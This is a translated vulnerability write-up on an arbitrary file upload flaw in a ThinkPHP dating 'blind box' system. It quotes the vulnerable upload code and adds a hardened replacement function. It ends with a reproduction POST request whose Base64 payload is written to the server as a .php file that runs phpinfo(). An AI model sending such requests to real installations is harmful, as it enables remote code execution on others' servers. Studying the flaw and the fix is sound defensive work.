月老情侣交友盲盒系统 (the "Yuelao Couples Dating Blind Box System") is a blind-box source package developed with ThinkPHP. Version 4.0 mainly brings large improvements to anti-blocking/anti-flagging (防封防红) and adds many features. Compared with the blind-box source shared earlier, this package adds tacit-match, same-city match, random match and zodiac match modes, and the UI is designed very professionally and attractively; it looks quite good!

Framework: ThinkPHP V5.1.41 Debug: True
Vulnerability analysis

The vulnerability lies in the upload method of the controller /app/controller/Upload.php. It receives Base64-encoded files via input('data/a') and hands each one to the base64Image helper. The code is as follows:
```php
public function upload(){
    // array of data: URLs submitted by the client
    $data = input('data/a');
    $path = [];
    foreach ($data as $v){
        // each entry is decoded and written under uploads/<date>/
        $res = base64Image($v,"uploads/".date("Y-m-d")."/");
        if ($res['code']) {
            $path[] = $res['file'];
        }
    }
    foreach ($path as $index => $item) {
        $path[$index] = substr($item,strpos($item,'attachment'));
    }
    // the stored paths are returned to the caller
    echo json_encode(['code'=>1,'data'=>$path]);
}
```
Tracing into /common.php, the shared function file (every controller can call any function defined in it), we find base64Image: it takes the type captured from the data: prefix as the file extension and passes the decoded Base64 content straight to file_put_contents, writing it into /uploads/img/ (the default directory; the controller above passes uploads/<date>/) with no filtering whatsoever. That is what produces the vulnerability.
```php
function base64Image($image,$filepath='uploads/img/'){
    $imgBase64 = $image;
    if (preg_match('/^(data:\s*image\/(\w+);base64,)/',$imgBase64,$res)) {
        // image type (taken verbatim from the data: prefix)
        $type = $res[2];
        // image save path
        $new_file = $filepath;
        if (!file_exists($new_file)) {
            mkdir($new_file,0755,true);
        }
        // image file name: timestamp + microseconds + random number, with the client-supplied type as extension
        $new_file = $new_file.time().substr(microtime(),-5).rand(000,999).'.'.$type;
        if (file_put_contents($new_file,base64_decode(str_replace($res[1],'', $imgBase64)))) {
            $msg['code'] = true;
            $msg['file'] = $new_file;
            $msg['msg'] = 'ok';
        } else {
            $msg['code'] = false;
            $msg['msg'] = 'no';
        }
        return $msg;
    }
    // no return value when the prefix does not match: the caller receives null
}
```
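As a defender-side counterpart to the analysis above, here is a hardened replacement for base64Image(). This is an added example written for this page, not the project's code: the function name safe_base64_image, the ALLOWED_TYPES constant and the write location are assumptions, and the two data: URLs at the bottom are constructed samples for a stand-alone run. It fixes the three root causes visible in the original: the extension is derived from an allowlist instead of the client's `image/<anything>` string, the decoded bytes are checked to really be an image of that type, and the file name is chosen entirely by the server.

```php
<?php
// Added example for this write-up, not part of the original project.
// Hypothetical names: safe_base64_image(), ALLOWED_TYPES.
declare(strict_types=1);

// Maps both the declared type and the detected type to the extension we will write.
const ALLOWED_TYPES = [
    'png'  => 'png',
    'jpeg' => 'jpg',
    'jpg'  => 'jpg',
    'gif'  => 'gif',
    'webp' => 'webp',
];

function safe_base64_image(string $image, string $filepath = 'uploads/img/'): array
{
    // 1. Only accept a data: URL whose declared type is on the allowlist.
    //    The original regex used \w+ and turned "image/php" straight into a ".php" extension.
    if (!preg_match('/^data:image\/(png|jpe?g|gif|webp);base64,/i', $image, $m)) {
        return ['code' => false, 'msg' => 'unsupported type'];
    }
    $declared = strtolower($m[1]);

    // 2. Strict decode: anything that is not clean Base64 is rejected.
    $bytes = base64_decode(substr($image, strlen($m[0])), true);
    if ($bytes === false || $bytes === '') {
        return ['code' => false, 'msg' => 'bad base64'];
    }

    // 3. Trust the bytes, not the header: detect the real format from the content
    //    and require it to agree with what the client declared.
    $info = @getimagesizefromstring($bytes);
    if ($info === false) {
        return ['code' => false, 'msg' => 'not an image'];
    }
    $real = image_type_to_extension($info[2], false); // "png", "jpeg", "gif", "webp", ...
    $ext  = ALLOWED_TYPES[$real] ?? null;
    if ($ext === null || ALLOWED_TYPES[$declared] !== $ext) {
        return ['code' => false, 'msg' => 'content/type mismatch'];
    }

    // 4. Write under a server-generated random name; the client never influences the extension.
    if (!is_dir($filepath) && !mkdir($filepath, 0755, true) && !is_dir($filepath)) {
        return ['code' => false, 'msg' => 'no upload dir'];
    }
    $name = $filepath . bin2hex(random_bytes(16)) . '.' . $ext;
    if (file_put_contents($name, $bytes, LOCK_EX) === false) {
        return ['code' => false, 'msg' => 'write failed'];
    }
    return ['code' => true, 'file' => $name, 'msg' => 'ok'];
}

// Constructed samples for a stand-alone run (php this_file.php):
// a 1x1 transparent GIF, and the declared-as-php payload from the write-up.
$gif1x1 = 'data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7';
$notImg = 'data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==';
var_dump(safe_base64_image($gif1x1, sys_get_temp_dir() . '/img/'));
var_dump(safe_base64_image($notImg, sys_get_temp_dir() . '/img/'));
```

Run stand-alone, the GIF sample is accepted and written under a random hex name with a .gif extension, while the declared-as-php sample fails at step 1 before anything is decoded or written. Two further measures that this function cannot provide on its own are worth pairing with it: serve the upload directory with script execution disabled (for example a web-server rule that refuses to pass files under uploads/ to the PHP interpreter), and keep the controller behind the application's authentication so that the endpoint is not reachable by anonymous clients.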
Vulnerability reproduction

Simply POST the parameter data with the Base64-encoded content. To convert any file to Base64 online, click here: https://www.myshengong.com/tool/file-to-base64
```http
POST /app/upload/upload HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Cookie: admin_token=6169XyCZ4aFgkoAJYWPrmlH5uKLQOLMi8CwWeC%2FK; PHPSESSID=8d8cmkasea6mfej4t2b1a27blf
Host: 127.0.0.1:81
Origin: http://127.0.0.1:81
Referer: http://127.0.0.1:81/app/upload/upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

data=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==
```